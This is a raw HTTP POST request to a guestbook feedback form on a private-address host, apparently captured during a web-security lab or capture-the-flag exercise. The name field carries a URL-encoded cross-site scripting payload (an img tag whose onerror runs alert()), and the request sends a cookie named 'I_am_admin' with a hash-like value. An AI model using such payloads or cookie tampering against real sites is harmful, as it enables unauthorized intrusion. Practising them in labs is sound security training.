POST /index.php?page=feedback HTTP/1.1
Host: 10.18.125.219:8000
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 118
Origin: http://10.18.125.219:8000
Connection: keep-alive
Referer: http://10.18.125.219:8000/index.php?page=feedback
Cookie: I_am_admin=68934a3e9455fa72420237eb05902327
Upgrade-Insecure-Requests: 1

txtName=%3cimg%20src%3dx%20onerror%3dalert()%3e&mtxtMessage=Comment+Here&btnSign=Sign+Guestbook